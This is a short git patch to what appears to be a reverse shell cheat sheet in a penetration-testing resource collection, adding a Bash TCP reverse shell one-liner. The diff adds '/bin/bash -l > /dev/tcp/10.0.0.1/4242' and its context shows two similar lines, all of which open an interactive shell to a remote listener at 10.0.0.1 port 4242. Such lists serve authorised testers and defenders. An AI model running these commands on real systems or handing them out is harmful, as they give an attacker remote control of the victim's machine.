From 209380740b2c45bcbd97c63851373a31b143d03c Mon Sep 17 00:00:00 2001 From: pswalia2u Date: Sun, 28 Mar 2021 18:58:07 +0530 Subject: [PATCH] Update Reverse Shell Cheatsheet.md Added new Bash TCP reverse shell --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 4ee06f6..96fc6de 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -44,6 +44,8 @@ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196 + +/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1 ``` ### Bash UDP